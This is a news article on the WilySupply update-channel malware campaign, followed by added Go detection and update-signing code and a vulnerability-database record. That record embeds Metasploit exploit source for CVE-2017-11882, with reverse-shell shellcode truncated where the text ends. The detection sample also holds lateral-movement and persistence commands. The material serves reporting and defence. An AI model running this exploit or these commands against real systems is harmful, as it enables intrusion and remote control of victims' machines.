Supply Chain Update Software Unknowingly Used in Attacks
2017-05-05T14:11:31
ID THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B Type threatpost Reporter Tom Spring Modified 2017-05-05T18:11:31
Microsoft said a recent attack it calls Operation WilySupply utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.
The unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.
“While their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,” said Elia Florio, senior security software engineer with the Windows Defender ATP Research Team.
It’s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the “most valuable targets” in an effort to avoid detection.
“We believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,” Florio wrote.
He said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. “Windows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,” Florio wrote.
A forensic analysis of the Temp folder on one of the targeted systems revealed the legitimate third-party updater running as a service. However, closer inspection revealed the updater had also downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.
“The downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,” Florio wrote. “The malware binary, named by the cybercriminals ue.exe, was a small piece of code with the sole purpose of launching a Meterpreter shell.”
Meterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It’s one of several open-source tools, such as Lazagne, that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary’s control server. In-memory or fileless attacks, Florio said, are a fast-growing trend among cybercriminals.
Attackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third party had infiltrated the remote update channel of the supply chain.
Self-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies’ EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft’s ALZip compression application, according to researchers.
Also noteworthy, Florio said, was that the adversaries conducted advanced reconnaissance, qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST and WHOAMI.
Additional tactics, techniques and procedures Florio noted included: memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; migration into long-lived processes, such as the Windows Print Spooler (spoolsv.exe); use of common tools like Mimikatz and Kerberoast to dump hashes; lateral movement using Windows Management Instrumentation (WMI), specifically the WMIC /node command; and persistence through scheduled tasks created using the SCHTASKS and AT commands.
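As an added illustration, not code from Microsoft's report or from this article, the following Go program turns the TTPs listed above into simple detection rules and runs them over a constructed process-creation sample. The event fields, host names, paths and IP address are this example's own assumptions, and the rules are starting-point heuristics rather than any product's logic.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a constructed, minimal process-creation record (the fields an EDR
// or Sysmon process-create event exposes); the field names are this example's own.
type ProcEvent struct {
	Host, Parent, Image, CmdLine string
}

type Hit struct {
	Rule  string
	Event ProcEvent
}

// rules map the post-compromise TTPs the article lists to small, explainable
// parent/child and command-line heuristics (all matching is case-insensitive).
var rules = []struct {
	Name  string
	Match func(e ProcEvent) bool
}{
	{"lateral movement: WMIC /node remote process creation", func(e ProcEvent) bool {
		c := strings.ToLower(e.CmdLine)
		return strings.EqualFold(e.Image, "wmic.exe") && strings.Contains(c, "/node:") && strings.Contains(c, "process call create")
	}},
	{"persistence: scheduled task created with SCHTASKS or AT", func(e ProcEvent) bool {
		c := strings.ToLower(e.CmdLine)
		img := strings.ToLower(e.Image)
		return (img == "schtasks.exe" && strings.Contains(c, "/create")) ||
			(img == "at.exe" && len(strings.Fields(c)) > 1) // a bare "at" only lists jobs
	}},
	{"memory-only payload: PowerShell spawned by rundll32", func(e ProcEvent) bool {
		return strings.EqualFold(e.Parent, "rundll32.exe") && strings.EqualFold(e.Image, "powershell.exe")
	}},
	{"process migration: Print Spooler spawning a shell", func(e ProcEvent) bool {
		img := strings.ToLower(e.Image)
		return strings.EqualFold(e.Parent, "spoolsv.exe") && (img == "cmd.exe" || img == "powershell.exe")
	}},
}

// Detect runs every rule over every event and returns the hits in event order.
func Detect(events []ProcEvent) []Hit {
	var hits []Hit
	for _, e := range events {
		for _, r := range rules {
			if r.Match(e) {
				hits = append(hits, Hit{Rule: r.Name, Event: e})
			}
		}
	}
	return hits
}

// reconTools are the host-qualification utilities the article names. Any one is
// routine; several on the same host is the signal ReconHosts looks for.
var reconTools = map[string]bool{"ipconfig.exe": true, "netstat.exe": true, "nltest.exe": true, "whoami.exe": true}

// ReconHosts returns hosts on which at least `threshold` distinct recon tools ran.
func ReconHosts(events []ProcEvent, threshold int) []string {
	seen := map[string]bool{} // host|tool pairs already counted
	count := map[string]int{}
	for _, e := range events {
		img := strings.ToLower(e.Image)
		if reconTools[img] && !seen[e.Host+"|"+img] {
			seen[e.Host+"|"+img] = true
			count[e.Host]++
		}
	}
	var hosts []string
	for h, n := range count {
		if n >= threshold {
			hosts = append(hosts, h)
		}
	}
	return hosts
}

// SampleEvents is a constructed telemetry sample: routine admin activity mixed
// with events shaped like the TTPs above (hosts, paths and the IP are made up).
func SampleEvents() []ProcEvent {
	return []ProcEvent{
		{"WS01", "cmd.exe", "whoami.exe", "whoami /all"},
		{"WS01", "cmd.exe", "ipconfig.exe", "ipconfig /all"},
		{"WS01", "cmd.exe", "nltest.exe", "nltest /dclist:corp"},
		{"WS01", "cmd.exe", "netstat.exe", "netstat -ano"},
		{"WS01", "rundll32.exe", "powershell.exe", "powershell -nop -w hidden -enc <placeholder>"},
		{"WS01", "cmd.exe", "schtasks.exe", "schtasks /query /fo LIST"},
		{"WS01", "cmd.exe", "schtasks.exe", "schtasks /create /sc minute /mo 30 /tn Updater /tr C:\\Temp\\ue.exe"},
		{"WS01", "cmd.exe", "wmic.exe", "wmic /node:10.0.0.25 process call create \"cmd /c <placeholder>\""},
		{"WS02", "cmd.exe", "at.exe", "at \\\\WS02 13:00 C:\\Temp\\ue.exe"},
		{"WS02", "spoolsv.exe", "cmd.exe", "cmd /c whoami"},
	}
}

func main() {
	for _, h := range Detect(SampleEvents()) {
		fmt.Printf("[%s] %s: %s\n", h.Event.Host, h.Rule, h.Event.CmdLine)
	}
	fmt.Println("recon burst on:", ReconHosts(SampleEvents(), 3))
}
```

The benign `schtasks /query` event and the single recon commands show what the rules deliberately do not flag.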
Florio’s tips for protecting against such attacks include hardening update channels with strong encryption, placing script and configuration files in signed containers, and adopting Security Development Lifecycle best practices.
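The signed-container advice, worked through as an added example rather than code from the report: a Go updater that pins the vendor's public key and refuses any payload whose manifest is missing a signature, is signed by another key, or is paired with a different binary. The manifest format, key handling and sample payloads are this example's own assumptions; encrypting the channel itself (TLS) is assumed to be handled separately.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Manifest is a constructed, hypothetical update manifest: the client fetches it
// alongside the payload, checks its signature against the vendor key pinned in
// the installed updater, and only then compares the payload hash.
type Manifest struct {
	Version string
	SHA256  string // hex SHA-256 of the payload bytes
	Sig     []byte // ed25519 signature over signingBytes(); empty means unsigned
}

// signingBytes fixes exactly what the signature covers (a domain tag plus the
// fields), so a signature cannot be replayed onto a different manifest.
func (m Manifest) signingBytes() []byte {
	return []byte("update-manifest-v1\n" + m.Version + "\n" + m.SHA256 + "\n")
}

var (
	ErrUnsigned     = errors.New("rejected: manifest carries no signature")
	ErrBadSignature = errors.New("rejected: signature does not verify under the pinned vendor key")
	ErrHashMismatch = errors.New("rejected: payload hash differs from the signed manifest")
)

func sha256Hex(b []byte) string {
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:])
}

// VerifyUpdate is the client-side gate: nil means the payload may be run.
func VerifyUpdate(pinned ed25519.PublicKey, m Manifest, payload []byte) error {
	if len(m.Sig) == 0 {
		return ErrUnsigned
	}
	if !ed25519.Verify(pinned, m.signingBytes(), m.Sig) {
		return ErrBadSignature
	}
	if sha256Hex(payload) != m.SHA256 {
		return ErrHashMismatch
	}
	return nil
}

// SignManifest is the vendor-side step; the private key lives on the release
// system, never on the update server or the client.
func SignManifest(priv ed25519.PrivateKey, version string, payload []byte) Manifest {
	m := Manifest{Version: version, SHA256: sha256Hex(payload)}
	m.Sig = ed25519.Sign(priv, m.signingBytes())
	return m
}

// Scenarios returns the verdict for four cases: a genuine signed release, an
// unsigned binary pushed through the channel, a signed manifest paired with a
// swapped payload, and a manifest signed with a key other than the pinned one.
func Scenarios() map[string]error {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	_, otherPriv, _ := ed25519.GenerateKey(rand.Reader)

	genuine := []byte("constructed sample: legitimate updater payload 2.1")
	rogue := []byte("constructed sample: unsigned low-prevalence binary")
	signed := SignManifest(priv, "2.1", genuine)

	return map[string]error{
		"genuine":         VerifyUpdate(pub, signed, genuine),
		"unsigned":        VerifyUpdate(pub, Manifest{Version: "2.2", SHA256: sha256Hex(rogue)}, rogue),
		"swapped-payload": VerifyUpdate(pub, signed, rogue),
		"foreign-key":     VerifyUpdate(pub, SignManifest(otherPriv, "2.2", rogue), rogue),
	}
}

func main() {
	for name, err := range Scenarios() {
		if err == nil {
			fmt.Printf("%-16s accepted\n", name)
		} else {
			fmt.Printf("%-16s %v\n", name, err)
		}
	}
}
```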
{"id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "type": "threatpost", "bulletinFamily": "info", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp Folder _on one of the targeted systems revealed the legitimate third-party updater running as service. 
However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third-part had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. 
Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included; memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; Migration into long-living processes, such as the Windows Printer Spooler or _spoolsv_._exe_; use of common tools like Mimikatz and Kerberoast to dump hashes; ateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "published": "2017-05-05T14:11:31", "modified": "2017-05-05T18:11:31", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "reporter": "Tom Spring", "references": ["https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/", "https://threatpost.com/hard-target-fileless-malware/125054/"], "cvelist": ["CVE-2017-11882"], "lastseen": "2018-10-06T22:53:44", "viewCount": 6, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-10-06T22:53:44", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-11882"]}, {"type": 
"attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/"]}, {"type": "symantec", "idList": ["SMNTC-101757"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892510", "MYHACK58:62201892253"]}, {"type": "threatpost", "idList": ["THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:0530F0C06C353C977E040FFD41710189", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C"]}, {"type": "mskb", "idList": ["KB3162047"]}, {"type": "mmpc", "idList": ["MMPC:E948BE7841CC8D594A264907989ACD46"]}], "modified": "2018-10-06T22:53:44", "rev": 2}, "vulnersScore": 6.2}}
{"cve": [{"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11884.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11882", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-01-26T18:15:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2016"], "id": "CVE-2017-11882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-01-26T21:28:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2017-11-15T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "type": "attackerkb", "title": "CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. 
The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. 
The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = 
retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << 
'0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << 
'0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 